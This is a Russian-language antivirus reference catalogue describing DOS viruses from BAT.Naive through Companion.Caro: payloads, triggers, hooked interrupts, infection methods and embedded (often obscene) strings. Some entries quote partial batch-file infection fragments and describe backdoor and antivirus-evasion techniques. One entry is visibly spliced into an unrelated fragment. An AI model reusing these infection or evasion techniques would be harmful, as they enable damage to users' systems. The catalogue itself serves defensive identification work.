HIGHJAQ on COM?:38400,N,8,1 Система перезагружается если вирус определит, что бит Carrier Detect в течение 3-ех минут трижды устанавливался в единицу в соответствующем COM-порте. После перезагрузки системы вирус "перехватывает" INT 8, блокирует клавиатуру и запускает файл C:\COMMAND.COM с командной строкой "C:\ COM? /E:1024/P/F". Т.е., вирус определяет 3 звонка в течение 3-ех минут (1 звонок в минуту) от некоторого хакера и считает это "сигналом к взлому системы". После этого система перегружается, запускается COMMAND.COM и в порт модема посылается команда ATL0M0A. Хакер, позвонивший модемом в это время на данный компьютер, увидит после соединения системное приглашение "C:>" и сможет сделать с этим компьютером все, что хочет.

BAT.Naive

Неопасный резидентный вирус, заражающий BAT-файлы. Инфицированный BAT- файл проверяет наличие переменной среды RANGE_CHECK, если она равна "yes", то вирус отдает управление содержимому оригинального BAT-файла. Если данная переменная не установлена в "yes", то следующими строками вирус создает файл naive.com, в который записывает код проверки наличия в памяти своей TSR-копии, после чего запускает данный файл - "@naive.com". При отсутствии TSR-копии NAIVE.COM устанавливает соответствующий код возврата, который анализируется BAT-вирусом. Далее файл NAIVE.COM создается заново и в него записывается код, получающий информацию из стандартного входа (CON), который в свою очередь поступает из созданного файла NAIVE.DAT, в который вирус записал закодированный текст своего кода (один байт преобразован в два символа). Файл NAIVE.COM преобразует символы ASCII по некоторому алгоритму перекодирования (два символа - в один байт) в программный код и записывает этот код в файл NAIVE.EXE:
@echo>naive.com №ЁРБьЁУrXґ?........
@echo>naive.dat DDMJDDNCLEP........
@echo>>naive.dat IMAGPAACIJ........
...................................
@naive.comnaive.exe
Затем файлы NAIVE.COM и NAIVE.DAT удаляются:
@del>nul naive.com
@del>nul naive.dat
Запускается файл NAIVE.EXE, устанавливающий в память свою TSR-копию.
@naive.exe>nul
Файл NAIVE.EXE удаляется и устанавливается переменная среды RANGE_CHECK=yes, и управление отдается оригинальному BAT-файлу.
@del>nul naive.exe
@set range_check=yes
Далее при смене каталога (f.3Bh INT 21h) резидентная часть вируса производит поиск *.BAT-файлов, проверяет их на зараженность, и если они еще не заражены, создает файл NAIVE.TMP, производит кодирование своего программного кода в последовательность символов ASCII и записывает 4894 байт в файл NAIVE.TMP. После этого вирус дописывает в файл NAIVE.TMP содержимое оригинального BAT-файла и переименовывает NAIVE.TMP в имя BAT-файла.

BAT.Pot, BAT.Xop367, 850, BAT.Zep, BAT.Zop (1,2).

Неопасные нерезидентные вирусы. Заражают *.BAT-файлы в текущих и родительских директориях. BAT.Zop содержит текст "::[8m --- [ZoP_B] Batch Infector ---". BAT.Pot выводит тексты "You're Stoned!", "Let me outta here!".

BAT.Winstart.296, 297

Неопасные резидентные вирусы, создающие файлы WINSTART.BAT. При старте такого файла вирусы копируют содержимое стартовавшего BAT-файла, содержащего вирусный код в файл C:\Q.COM и запускают его:
@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
Далее управление в файле C:\Q.COM попадает на эти же команды, которые уже выполнялись в инфицированном BAT-файле, но только в данном случае команды в COM-файле уже представлены, как ассемблерные инструкции, которые отдают управление командам, следующими за строкой C:\Q. Вирусы устанавливают свою копию резидентно в память (в область HMA) и "перехватывают" INT 2Fh, после этого переименовывают файл C:\Q.COM в C:\WINSTART.BAT. Резидентные копии вирусов контролирует запуски командного процессора и создают файл WINSTART.BAT в текущем директории.

Bauman.2203

Очень опасный нерезидентный вирус. В пятницу во второй половине дня уничтожает информацию на первом жестком диске. Оставляет в памяти резидентную копию, которая "гуляет" по разным адресам памяти и удаляет программы с именами DRWEB и AVP при их запуске. Содержит текст "© T&T Bauman".

Beast.Zver

Очень опасный резидентный вирус. Использует алгоритм заражения, заимствованный из вирусов семейства Beast - в начало файла записывается вирусный код, а оригинальное начало хранится в последнем неиспользуемом кластере файла на диске. Длина файла не меняется при этом не изменяется. Но длина файла по цепочке FAT может не совпадать с реальной длиной. Вирус содержит текст "~ZVER~".

Beda.337, 338, 352, 883, 1301, 1530

Свое название получили за функцию проверки своего наличия в памяти - f.BEDAh INT 21h. Beda.883, 1301 устраивают видеоэффект - три цветные линии, плавающие по экрану. Beda.352 имеет строку "ACHE". Beda.1301, 1530 при открытии (f.3Dh INT 21h) инфицированного файла создают новый файл \$a._$, в который записывают содержимое оригинального файла и возвращают открывающей программе описатель (handle) данного созданного файла. При закрытии файла (f.3Eh INT 21h) вирусы удаляют файл \$a._$. Beda.1530 удаляет файлы, начинающиеся на -V, WEB, AIDS, A-DIN. Также, Beda.1530 иногда изменяет в буфере клавиатуры нажатие клавиш F5, N, n соответственно на F8, Y, y.

Beer.645

Неопасный резидентный вирус. Иногда выводит текст "Ceйчac бы пивкa".

Beer.2473, 2620, 2794, 2850, 2984, 3164(1,2), 3192(1-3), 3399, 3490(1,2)

Опасные резидентные шифрованные вирусы. Beer.2473, 3164, 3192, 3307, 3399 уничтожают файлы DISKDATA.DTL, VIRUSES.INF, DIRINFO, -V.MSG или A-DINF-°.°°°. Иногда проигрывают мелодию и выводят сообщения:
Beer.2473 - Виpус,Виpус ха-ха-ха. ПРЯМО СВЕРXУ xa-xa-xa-xa !!!
Beer.2620, 2794, 2850, 2984, 3164, 3192, 3490 - Ceйчac бы пивкa
Beer.3399 - Lozinsky! I know you to be old beer drinker. How about a mug of beer or two? It would be amazing to meet you at our beer party. You are welcome at Solntsevo railway station About 17.00 p.m. every friday and wednesday.
Beer.3490 (1,2) содержат тексты "EGA - text mode demonstration Copyright © by Wadim 1990.", "I love you ,Ann !ANNA", "Wadim S.".

BG.1348

Опасный резидентный зашифрованный вирус. Иногда выводит текст:
Seems so simple now
Now that the sky is clear
Maybe the road was tough
But at last we're here
I've nothing to hide from you
Nothing to explain
Just this vision of broken wing
And the raven cries in pain...
Enter the name of song:
При неправильном ответе вирус "зацикливает" систему.Также может вывести на экран картинку.

BG.2135

Hеопасный резидентный шифрованный вирус. При одновременном нажатии на клавиши F12, NumLock, CapsLock и ScrollLock, вирус выводит текст:
И, может быть, тогда откроется дверь,
И звезды замедлят свой ход.
И мы встанем на пристани вместе,
Взявшись за руки, глядя на парусный флот.

BG.3084

Опасный резидентный полиморфный вирус. Выводит на экран текст Рок-н-ролл мертв, а я еще нет...
При открытии файлов с расширениями TXT,PAS,CPP,DIZ,NFO вирус записывает
в них тексты:
Я буду учиться не оставлять следов,
Учиться мерить то, что рядом со мной:
Землю - наощупь, хлеб и вино - на вкус,
Губы губами, небо - своей звездой;
Я больше не верю в то, что есть что-то еще;
А глаза с той стороны прицела ясны.
Все назад! Я делаю первый шаг,
Я начинаю движение в сторону весны...
То ли вынули чеку,
То ль порвалась связь времен.
Подружились господа,
Да с Господней сранью.
На святой горе Монмартр
Есть магический Семен,
Он меняет нам тузы
На шестерки с дрянью.
Раньше сверху ехал Бог,
Снизу прыгал мелкий бес,
А теперь мы все равны,
Все мы анонимы.
Через дырку в небесах
Въехал белый Мерседес,
Всем раздал по три рубля
И проехал мимо...
нтные шифрованные вирусы. 17 ноября выводят текст:
G+A=

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Press any key to go on

BigMouse.998

Очень опасный шифрованный резидентный вирус. В апреле уничтожает содержимое логического диска D:. Содержит строки "SCANCLEAVIRSF-PRCPAV" и "-=GC73=-".

Birthday.512

Опасный нерезидентный вирус. 31 числа в 11 часов удаляет стартовавшую инфицированную программу. Содержит текст "Happy Birthday!!".

Bishkek.319

Опасный нерезидентный вирус. 31 числа уничтожает содержимое 10 первых секторов жесткого диска. 22 числа выводит текст "Scorpions by Sch(5) in Bishkek".

BitAddict.979, 1190, 1459, 1601

BitAddict.979, 1190 - неопасные, BitAddict.1459, 1601 - очень опасные резидентные вирусы. Размещают свою резидентную копию в нескольких системных буферах. При первом запуске стремятся заразить командный процессор, указанный через переменную COMSPEC. BitAddict.1459, 1601 уничтожают содержимое секторов диска D: после 256 "переходов" вирусов с одного компьютера на другой.

Bitch

Неопасный Boot-вирус. Пытается заместить собой вирусы Stoned и Michelangelo, если обнаружит их на дисках. При ошибке записи своего кода на диск выводит на экран текст: "ю.Z.яэF< SVINOLOBOVA SYKA >S0_MBR © 04.1994 by @SOURCE (ЛИАП). По всем вопросам обращаться по тел. 264-35-27 ( после 22ч. Люда ).".

BlackJec.231,232,235,236,247,252,267,272,276,281,287,292,301,307,358,363,369, 374,378,427,440,441

Неопасные (BlackJec.301, 307 - опасные) нерезидентные вирусы. BlackJec.301, 307 в сентябре пытаются отформатировать первую дорожку текущего флоппи-диска и выводят текст "Sad virus - 24/8/91".

BlackMonday.1055

Очень опасный резидентный вирус. В понедельник форматирует нулевую дорожку жесткого диска. Содержит текст "Black Monday 2/3/90 KV KL MAL".

BlackSun.2372

Неопасный резидентный зашифрованный вирус. Иногда "трясет" экран посредством изменения строчных букв на заглавные и наоборот на экране. Содержит тексты "CHKLISTDISKINFOSCOPEЕ", "BlackSun v1.0 "Shaker"".

BlackWorm

Очень опасный загрузочный вирус. Начиная с 1995 года уничтожает содержимое первого жесткого диска. Содержит текст "BLACK WORM".

Blah.3379, 3385

Неопасные файлово-загрузочные стелс-вирусы. Заражают MBR жесткого диска и BAT-файлы. При старте инфицированного BAT-файла, вирусы создают файл є.com, в который записывают некоторый текст. После чего вирусы отдают управление данному є.com файлу. Первые байты текста файла є.com воспринимаются процессором, как ассемблерный код, производящий по определенному закону,конвертацию текстовых строк в вирусные инструкции. Далее є.com файл устанавливает свою резидентную копию в память, "перехватывает" INT 13h, 21h и заражает MBR "винчестера". После чего файл є.com удаляется. Резидентные копии вирусов заражают BAT-файлы и осуществляют стелс-механизм сокрытия вирусного кода в инфицированных BAT-файлов и MBR. Вирусы содержат текст "Blah virus (DA/PS)"

Blind.549

Опасный нерезидентный вирус. Из-за ошибок может разрушить инфицируемые файлы. Содержит текст "=Blind Guardian 1995=".

Blink.501

После каждого 4 заражения файла вирус "мигает" экраном.

Bobby.613

Неопасный нерезидентный вирус. По пятницам выводит текст: Пpивет, я - безобидный виpyс Bobby Friday. Я не пpичиню вpеда вашемy компьютеpy Я только бyдy говоpить по пятницам, что моемy автоpy очень нpавится девyшка по имени СВЕТА.

Bomzh.3809

Опасный резидентный шифрованный вирус. "Перехватывает" INT 17h (вывод на принтер) и INT 21h. При печати на принтер вставляет после запятой междометие ", бля". Содержит тексты:
Приветствую всех хакеров, читающих этот текст.
Этот вирус - типичный "студенческий".
Приношу всем пострадавшим от его некорректных
действий свои искренние извинения.
Он был написан в период летней практики только от скуки.
Благодарю за помощь, которую мне оказали:
Игоря Данилова(за его VIRLIST),
Евгения Касперского(за "Компьютерные вирусы в MS-DOS".
Евгений, не пишите больше таких книг - "чайникам" они бесполезны,
профи - насрать, а вот вирусописатели...),
Карпова Вадима - за литературу,
Иванова Олега - за комп.
Все замечания в свой адрес приму
через FIDONET 2:5033/1.32 с пометкой "Бомжу".
Желаю всем жить счастливо!
Пока!
Ваш Бомж.
Бомж-вирус.

Bones

Очень опасный загрузочный стелс-вирус. 7 числа уничтожает содержимое дискеты, к которой происходит обращение, и первого жесткого диска.

BootCom.Light

Неопасный файлово-загрузочный вирус. При первом старте зараженного COM- файла, вирус инфицирует MBR жесткого диска. При загрузке системы с такого диска вирус "перехватывает" INT 1Ch, ждет второго изменения INT 21h, после чего "перехватывает" INT 21h. Содержит текст "© Light General.For free use!Kiev.1995".

BootCom.Peanut.445

Опасный вирус. Заражает MBR жесткого диска и Boot-сектора гибких дисков, а также COM-файлы при их запуске. При старте инфицированного COM-файла или при загрузке с зараженного флоппи-диска вирус поражает MBR "винчестера". При загрузке с инфицированного жесткого диска вирус размещает свою TSR-копию в верхних адресах памяти и перехватывает INT 13h. После загрузки первой EXE-программы вирус перехватывает INT 21h. При заражении дискет вирус не сохраняет оригинальный Boot-сектор. При чтении через INT 21h зараженного MBR вирус подставляет оригинальный MBR (стелс-вирус).

BootExe.174

Очень опасный файлово-загрузочный вирус. Внедряет свой код в середину загрузчика MBR, устанавливая на этот код свою программную ссылку. При загрузке системы с инфицированного диска устанавливает свою резидентную копию в таблицу векторов прерываний, "перехватывает" INT 13h, проверяет запись на флоппи-диски COM или EXE-файлов (определяя их по первым байтам заголовка файла: 0E9h - для COM и 'MZ' - для EXE-файлов) и записывает свой код в начало данных файлов, не сохраняя оригинальный программный код.

BootExe.443, 444, 451 (1,2), 452

Опасные вирусы. Заражают Boot-сектора "винчестера" и гибких дисков, а также EXE-файлы, внедряя свой код в заголовок EXE-файлов, превращая файл из формата EXE в формат COM-файла. Вирусы перехватывает INT 13h и "следят" за чтением секторов. Если прочитанный сектор содержит сигнатуру "MZ", то вирусы считают, что был считан заголовок EXE-файла. И если данный заголовок равен 512 байтам, и EXE-файл имеет достаточно свободного места в таблице перемещаемых элементов (relocation table), то вирусы записывают в свободное место заголовка EXE-файла свое тело и изменяют сигнатуру "MZ" на короткий JUMP (EBh ??) на свой код. После чего производят запись данного сектора, содержащий вирус, на диск. Вирусы также заражают Boot-сектор жесткого диска, считая, что он располагается на головке-1, дорожке-0, секторе-1. При заражении дискет, отличных от 360 Kb, вирусы не сохраняют оригинальный Boot-сектор.

BootExe.Dogcher

Опасный резидентный вирус, заражающий MBR первого жесткого диска и EXE-файлы. При заражении EXE-файлов вирус записывает оригинальный сектор, содержащий заголовок EXE-файла (512 байт) в сектор, предшествующий исходному, не проверяя его содержимое.

BootExe.Olga

Опасный вирус. Заражает MBR жесткого диска и EXE-файлы. 27 декабря уничтожает содержимое жесткого диска. Содержит текст "SGB:Olga++".

BootExe.Platov

Устанавливает свою резидентную копию по адресу 9000:FC00h. Принадлежит "перу" Андрея Платова.

BootExe.Stalker.310, 320

Опасные резидентные вирусы, заражающие MBR "винчестера" и EXE-файлы. При запуске инфицированного EXE-файла, вирусы заражают MBR, не сохраняя оригинальный загрузочный сектор MBR, и "вешают" систему. При загрузке системы с инфицированного MBR, вирусы устанавливают в память свои резидентные копии и "перехватывают" INT 13h. BootExe.Stalker.320 содержит строку "*Stalker*" с инвертированными битами.

Bowl.737

Неопасный нерезидентный шифрованный вирус. Неработоспособен на Pentium PC.

Brasil

Очень опасный загрузочный вирус. Может вывести текст "Brasil virus!" и уничтожить содержимое секторов жесткого диска.

Bravo

Опасный загрузочный вирус. Может уничтожить содержимое MBR, записав вместо него случайные данные, в начале которых будет присутствовать строка "Bravo".

Brownie.688

Неопасный вирус. 13 числа выводит текст "brownie for Koliada A.I." и воспроизводит некие звуки на динамике.

BrPI.511, 555

Неопасные резидентные вирусы. BrPI.555 производит скроллинг экрана на несколько строк вверх для каждого 3-го стартующего инфицированного файла. Содержат строки:
BrPI.511 - "© by BrPI Version 2.0 '92"
BrPI.555 - "by BrPI '92".

Btg.792

Неопасный резидентный вирус. При запуске некоторых программ может вывести текст "Error in EXE file". Содержит строку "Btg#".

Bug.920

Опасный нерезидентный вирус. Производит поиск *.EXE файлов и создает для этих файлов COM-файлы длиной 73 байта, не содержащие вирусный код, а только производящих запуск данных EXE-файлов. Также производит поиск и заражение стандартным образом COM-файлов. Удаляет файлы c:\chklist.*. Производит изменение случайного символа знакогенератора. Содержит текст "BUG-2.0oН".

Burger.382, 560

Очень опасные, замещающие программный код, вирусы. Burger.382 иногда пытается переименовать файл с расширением EXE в файл с расширением COM. Уничтожают информацию в 2ух случайных секторах диска C:.

Burglar.1150

Неопасный резидентный вирус. При значении секунд системного времени- 14 вирус выводит текст "Burglar/H". Не заражает файлы из списка (по 2 символа на имя) "CLHWTBF-WCTK". Содержит текст "AT THE GRAVE OF GRANDMA...".

Burma.442 (1,2), 666

Производят видеоэффект: все символы на экране кружась, исчезают в центре экрана. Burma.442 (1,2) выводят текст "[Tempest - р]", они содержат строку "Rangoon, Burma". Burma.666 выводит тексты "SwizzleStyxx!" и "Reading system configuration, please wait.", содержит также текст "DarkAvenger".

BW.Roet.1899

Опасный резидентный вирус. 20 декабря уничтожает содержимое логического диска C: и выводит текст: ROETVIRUS_E5IBINFECTION PC DeStruCTion aFTeR 255 bEEpsTry aGAin NexT YEar ROETJE - THE IMMENSE

ByeBye

2, 6, 10, 14, 18, 26 и 30 мая выводит на экран текст "Bye bye C&C".

0

3

C

Carbuncle

Очень опасный нерезидентный вирус-спутник. Представляет собой COM- файл длиной 622 байта. При запуске вируса, он создает в текущем каталоге файл CARBUNCL.COM с атрибутом Hidden (скрытый). После этого вирус предпринимает попытку поиска файла *.exe. Если файл с данным расширением будет найден, то вирус переименовывает его в файл с тем же именем, но с расширением CRP, а также создает новый пакетный файл-спутник или файл-компаньон с тем же именем и с расширением BAT. В данный пакетный файл вирус записывает команды DOS (допустим, что пораженный EXE-файл назывался EXEFILE):
@ECHO OFF
CARBUNCL
RENAME EXEFILE.CRP EXEFILE.EXE
EXEFILE.EXE
RENAME EXEFILE.EXE EXEFILE.CRP
CARBUNCL
Т. о., при попытке запуска EXE-файла будет запущен BAT-файл, который переименует CRP-файл в EXE-файл, выполнит его и переименует обратно в CRP-файл. Если во время запуска вируса (файл CARBUNCL.COM), значение секунд системного таймера меньше или равно 16, вирус записывает свой код в первый CRP-файл текущего каталога, уничтожая таким образом зараженный EXE-файл.

Cartier.1056

Очень опасный нерезидентный вирус. Если в текущем каталоге нет COM- файлов или они уже все инфицированы, то вирус уничтожает 50 секторов диска C:

Cascade.1621, 1661 (1,2), 1701 (1,2), 1704, 1706

Неопасные резидентные шифрованные вирусы. Вызывают эффект "падающих букв".

Cat.2770, 2898

Очень опасные стелс-вирусы. Заражают файл c:\command.com, если он существует. В дальнейшем заражают только .COM и .EXE-файлы, создаваемые (f.3Ch INT 21h) на дисках A: или B: при их закрытии (f.3Eh INT 21h). Т.о., в системе может быть только один зараженный файл c:\command.com. В COM-файлах либо изменяют 6 первых байт, если первая инструкция не JUMP, или 6 байт из адреса первого перехода, если первая команда - JUMP, на команды передачи управления основному вирусному коду, который находится в конце файла. Cat.2898 при старте программ, начинающихся на AD (ADINF), AI (AIDSTEST) удаляет вирусный код из файла c:\command.com, а потом снова заражает его. Cat.2770 1-го числа месяца пытается уничтожить информацию на первом жестком диске, записывая в сектора повторяющуюся строку "Little Cat". Cat.2898 29-го декабря уничтожает информацию на первом жестком диске.

Caterpillar (1-11)

Неопасные резидентные вирусы. Первым делом при старте вирус пытается заразить командный процессор C:\COMMAND.COM. Перехватывают INT 1Ch, 21h. Через некоторое время после установки в память вирусы "выпускают" на экран зеленую гусеницу "чю", которая ползая по экрану, "поедает" его.

CDJoke.848

Неопасный резидентный шифрованный вирус. Если в компьютере установлено CD-ROM устройство, то вирус "перехватывает" INT 16h и периодически открывает-закрывает CD-ROM drive. Содержит текст "CD Joke II by NemO".

CeCe.1703, 1994, 1998

Неопасные резидентные полиморфные вирусы. Содержат ошибку из-за которой вирусы не проверяют наличия своей резидентной копии в памяти и многократно заражают память. При 1000ом вызове INT 21h на экране появляется пролетающий слева направо объект, напоминающий муху. Содержат тексты:
CeCe.1703:
Hacked by Crazy Hacker
самоходные шаpоваpы
die Denis Ermakov
CeCe.1994, 1998:
Welcome to presentation of new program, named Ce-Ce!!!
Can you recognize what does it mean?
1. Do you know the fly living in the Africa?
2. Do you know int3 command opcode?
3. Do you know that 0CCh is equal to 204?
4. Do you know that CC is Computer Center abriviature?
5. Do you know the name of main hero in Santa Barbara?
6. Do you know ...

Chaos.1181, 1241

Очень опасные резидентные вирусы. Chaos.1181 13 числа устанавливает INT 09, 13h и через некоторое время выводит сообщение "CHAOS!!! Another Masterpiece of Faust..." и уничтожает содержимое секторов первого жесткого диска. Chaos.1241 в сентябре "перехватывает" INT 13h и при обращении к диску уничтожает его содержимое, после чего выводит текст "I see, I come, I conquer... Trojan horse-CHAOS v2.0 by Faust".

Check.282

Устанавливает свою резидентную копию в область повторяющихся нулей, в память до адреса 1000:0000. Содержит текстовую строку "ChecK1".

Checkbox.936

Опасный резидентный вирус. Первым делом пытается заразить файл C:\DOS\SMARTDRV.EXE. При появлении на экране строк "checkboxports", "givegodmode", "iamtheboss" вирус предпринимает некоторые действия по переводу консоли на COM-порт, через который, возможно, соединение взломщика с инфицированным компьютером.

CheckSum.1232, 1233

Проверяют контрольную сумму. И если она не соответствует истинной, вирусы резидентно в память не устанавливаются.

Cherry.2266

Неопасный резидентный шифрованный вирус с "задатками" полиморфика. "Перехватывает" INT 8, 21h. Иногда выводит текст:
ЫЯЫЮЫ ЫЮЫЫЮЫЫЮЫЫЮЫ ЫДНSTEALTH MUTANTНД Best......................
Ыі ЮЫЬЫЮЫЬЮЫЪЮЫЪЮЫЬЫіArkhangelsk'95....................................
ЫЬЫЮЫЪЫЮЫЬЮЫіЮЫі ЮЫЪЩАГТУ/ЭПП/IV.......................................
ДДДЩДЩДЩДДЩДЩ ДЩ ДЩ Hi000 Sc000 L20...................................
И рисует случайную картинку из звездочек "*". При достижении некоторых значений в собственных переменных вирус просит ввести имя пользователя "Enter your name :....", которое записывает в поле "Best". Не работает на процессоре Pentium.

Chigi

Неопасный загрузочный вирус. Иногда при загрузке системы выводит текст "IF YOU WANT TO FUCK CALL 575-52-94 LERA!!!!". Имеется также строка "CHIGI".

ChinBomb.1492

Очень опасный резидентный вирус, заражающий только один файл - COMMAND.COM. Может уничтожить содержимое 400 секторов жесткого диска, после чего выведет сообщение:
---- C h i n e s e B o m b ----
( Made in China 1989 )

Chukcha.554, 838

Неопасные нерезидентные вирусы. При запуске инфицированного файла, если не указана для него командная строка, то вирусы производят поиск и заражение COM-файлов. В процессе заражения вирусы создают файл чукча.!!!, записывают в него вирусный код, потом записывают код найденного COM-файла, после чего уничтожают COM-файл, а файл чукча.!!! переименовывают в исходный COM-файл. После этого выводится текст:
ТВОЯ МОЯ НЕ ЗАПУСКАЙ, МОЯ ВИРУСОМ ЗАРАЗИЛАСЬ ОДНАКО !
Если командная строка присутствует при старте зараженной программы, то вирусы удаляют свой код из файла-жертвы и выводят текст:
НЕ БОИСЬ, ПАРЯ, МОЯ МАЛЕНЬКО ПОШУТИЛ !

Cicada

Опасный загрузочный вирус. 10 июля уничтожает содержимое первого жесткого диска.

CityFire.1679

Неопасный резидентный вирус. Иногда выводит текст:
This city is on fire tonight.. Если ввести 'N', то будет выведено:
Эх, как жаль, ведь мне так хотелось э т о сделать ...
Если же нажать 'Y', то вирусы имитируют форматирование диска и выводят:
Hard disk 1 formated. All your data lost.
How are you feel now ?
Возможен вывод следующих текстов:
ХА - ХА - ХА !!!
СЛАВА К П С С !
НАРОД И ПАРТИЯ ЕДИНЫ !
ПРИВЕТ ОТ Г К Ч П!
Гречневым чавканьем сильной личности
Словестного поноса и рьяной кавалерией
Ты забейся в сточной ямочке,
Мягкой дырочке,
Пулями оставленной.
Ведь лучше стучать,чем перестукиваться-
Анонимная философия продавшихся заживо
За колоссальный бесценок,
Заживо погребенных.
Летнюю резину изношенных прокламаций
Обильно смоченных психоанализом.
Единым фронтом на почве соевой
Словно рыбка с растраченной импотенцией
Ты, ведущий, бля на новые подвиги
Мерзлой веточкой опьянения
Ковырни, ковырни в мыльном вареве
Невыносимо невинного прошлого
В мыльном вареве хлеба съеденного.
А небо все точно такое же,
Как если бы ты не продался ...
Е.Летов, "Гражданская оборона"

CivilDefence.33, CivilDefence.38, CivilDefence.39, CivilDefence.3A, CivilDefence.3B

Очень опасные файлово-загрузочные стелс-вирусы. При старте инфицированного файла, вирусы заражают MBR "винчестера", заменив в MBR 28h начальных байт на код вирусного загрузчика. Истинные же байты MBR вирусы копируют по смещению 10h в сектор, принадлежащий первому расширенному разделу DOS (Extended DOS Partition), если таковой существует на диске. Если же EDP не существует, то вирусы копируют 28h байт во второй сектор диска. Таблицу логических дисков в расширенном разделе DOS (смещение +1BEh) вирусы шифруют. Свое основное тело вирусы размещают в 13 секторах сразу же за первым Extended DOS Partition или начиная с 3-го сектора диска. После чего вирусы удаляют себя из запущенной программы. Активизация вирусов в память происходит после первой же перезагрузки системы с жесткого диска. При загрузке инфицированного MBR, вирусы считывают свое тело с диска в память по адресу 4020:0000h и перехватывают прерывания 08 (таймер), 09 (клавиатура), 13h (диск), 17h (принтер). При обращении к сектору EDP через INT 13h вирусы расшифровывают таблицу логических дисков в памяти. Далее вирусы следят за изменением INT 21h - если оно изменилось, вирусы перехватывают его. При запуске любой программы, вирусы перемещают свое тело в свободные адреса памяти (f.48h INT 21h). Во время загрузки вирусы могут переставить вектор INT 26h (запись на диск) на INT 16h (клавиатура). и ждать нажатия на клавишу, тем самым стирая информацию в случайных секторах диска. Иногда при нажатии на Ctrl-Alt-Del, вирусы могут вывести на зеленом фоне "философский" текст:
Завтра будет скучно и смешно,
Это не больно - просто вчера был день.
Завтра будет вечно и грешно,
Это не важно - важен лишь цвет травы.
Соль просыпана на ладонь.
Она рассыпана на ладони...
Мышеловка захлопнулась!
Егор Летов, ГРАЖДАНСКАЯ ОБОРОНА
Производят всяческие манипуляции с INT 09, при этом нажатия клавиш могут игнорироваться. При открытии файла (f.3Dh INT 21h) вирусы в выполняемой программе по определенному адресу, если слово по этому адресу F19Ah (?), могут изменить 5 байт на последовательность NOP'ов (90h). При записи на экран (f.40h BX=1 или BX=2 INT 21h) вирус ищут последовательность выводимых букв "Лoзинский ", и если они найдены, то ищут символ BCh - 'ј'. Если же и он найден, то вирусы, видимо, предполагая, что запущен популярный антивирус Aidstest, определяют PSP текущей задачи и пытаются определить имя этой программы. Открывают данный программный файл и определяют его дату создания (f.5700h INT 21h). Если файл создан до сентября 1992 года, то вирусы не предпринимают vникаких мер. Если же позже - то либо вирусы "вешают" систему, либо выводят на экран сообщение, примерно, следующего вида:
Внимание:
Обнаружен вирус CDV 3.3 (Civil Defence Virus) Неизлечим. Для устранения используйте утилиту FORMAT.COM
или:
Внимание:
Обнаружен вирус CDV 3.9 (Civil Defence Virus) Неизлечим. Для устранения используйте утилиту PREFOR.COM
после чего останавливают работу Aidstest и производят выход в DOS. EXE-файлы вирус заражает только на диске A: или B: при их поиске (f.4Eh,4Fh INT 21h). Файлы меньше 8000 байт не заражаются. Проверку защищенности дискеты от записи вирусы проверяют посредством чтения и записи логического сектора диска INT 25h, INT 26h. При печати на принтер могут выводить нецензурную брань.

Claudia.8772

Неопасный резидентный шифрованный вирус. После 25 августа выводит на экран текст:
Das ist ClaudiaSchiffer virus by OS
Sometimes when U stroling down the
Avenue the way U walk it makes men
Thinkof HAVING U when U walking
Down the street everybody stops
& turns 2 stare at U! (IrM)
Hope 2 meet U...somewhere in time
В левом нижнем углу экрана также находится фотография Клаудии Шиффер. Видимо, очень любит человек из Серпухова Клаудию... Может быть они, действительно, когда-нибудь встретятся...

Cli&Hlt.1345

Неопасный резидентный шифрованный вирус. Вызывает INT 02, меняет цвета символов на экране. Содержит текст "** © CLI&HLT Hackers Group **".

Click.329,375

Издают звуковой сигнал при заражении каждого файла.

CLME-вирусы

CLME (Crazy Lord Mutation Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан вирусописателем по "кличке" Crazy Lord.

CLME.Ming.1952

Опасный полиморфный вирус. Содержит инструкции i386. При неосторожной трассировке вирусного кода может уничтожить 34 первых секторов всех доступных физических дисков. Не заражает файлы оканчивающиеся на AN, OT, 86, PY, EG.

CloneWar.923 (2)

В зависимости от системного таймера, либо производит поиск *.EXE-файлов и создает вирусы-спутники с расширением COM для этих EXE-файлов, либо производит исполнение некоторой музыки (если это можно назвать музыкой) и "зацикливает" на этом систему.

CMOSDense.807

Опасный вирус. Периодически странным образом изменяет некоторые опции CMOS-памяти.

CNTV.2630

Опасный резидентный вирус. Размещает свою резидентную копию в системных буферах DOS. Часть обработчика INT 21h - в первом программном PSP (Program Segment Prefix). При запуске программы, вирус загружает ее в память с помощью f.4B01h Int 21h (загрузить без выполнения), трассирует стартовый код программы и внедряет свой расшифровщик по адресу 100-ой инструкции. Основной вирусный код зашифровывается и записывается в конец файла. Из-за ошибок вирус может испортить заражаемый файл. Иногда вирус может вывести сообщение: "н A CuBaN NeW TeChNoLoGy ViRuS By SoMeBoDy !".

Cock.512

При заражении каждого 15 файла выводит ругательство на английском языке. Содержит строку "Smart Cock".

CodeDa.1289

Опасный резидентный вирус. Первым делом пытается заразить командный процессор (COMMAND.COM), указанный в переменной COMSPEC. Через 7 дней после заражения файла блокирует нажатия клавиш ESC и "`". Свое название получил за вызов функции AX=CODE INT 21h для проверки своего нахождения в памяти и ответа AL=DA.

CoffeeShop.1568

Неопасный резидентный вирус. В пятницу, если значение секунд системного таймера равно 0 выводит изображение зеленого листа (см. MtE.CoffeeShop). Содержит строки "CoffeeShop", "MK '92", "COSCCLVSNEHTTBVIRAFEMTBR".

Collor.878

Опасный шифрованный вирус. В зависимости от системного таймера может уничтожить содержимое 15 первых секторов жесткого диска. Но перед этим выведет текст "Virus Collor De Mello".

CommanderBomber

При заражении файлов использует довольно сложный полиморфный алгоритм. Считывает 4096 байт из середины файла-жертвы и записывает их в конец файла. В освободившееся место записывает свой вирусный код. Затем вирус записывает несколько участков своего кода (подпрограмм) в различные места файла. Эти подпрограммы содержат, практически, все инструкции процессора 8086. Первая подпрограмма находится в начале файла, а последняя передает управление основному блоку вируса. Подпрограммы 'общаются' друг с другом с помощью команд передачи управления JMP, RET, CALL и т.д. Таким образом, инфицированный файл представляет собой программный код, который содержит в своем теле вирусные 'пятна'. Содержит текстовые строки "COMMANDER BOMBER WAS HERE" и "[DAME]".

Commando (1,2)

Неопасные резидентные вирусы длиной 421 и 498 байт. Различаются только видеоэффектами: переключают видеостраницы или "трясут" экран. Содержат строку "COMMANDO-3".

Companion.Caro

Опасный резидентный вирус-спутник.17 октября уничтожает содержимое всех логических дисков. При запуске с ключом -? вирус выводит текст:
This virus is dedicated to Caro, the girl that under less than a period
of 5 hours changed my life drastical. Positive or negative? Who knows..

Cordobes.3334

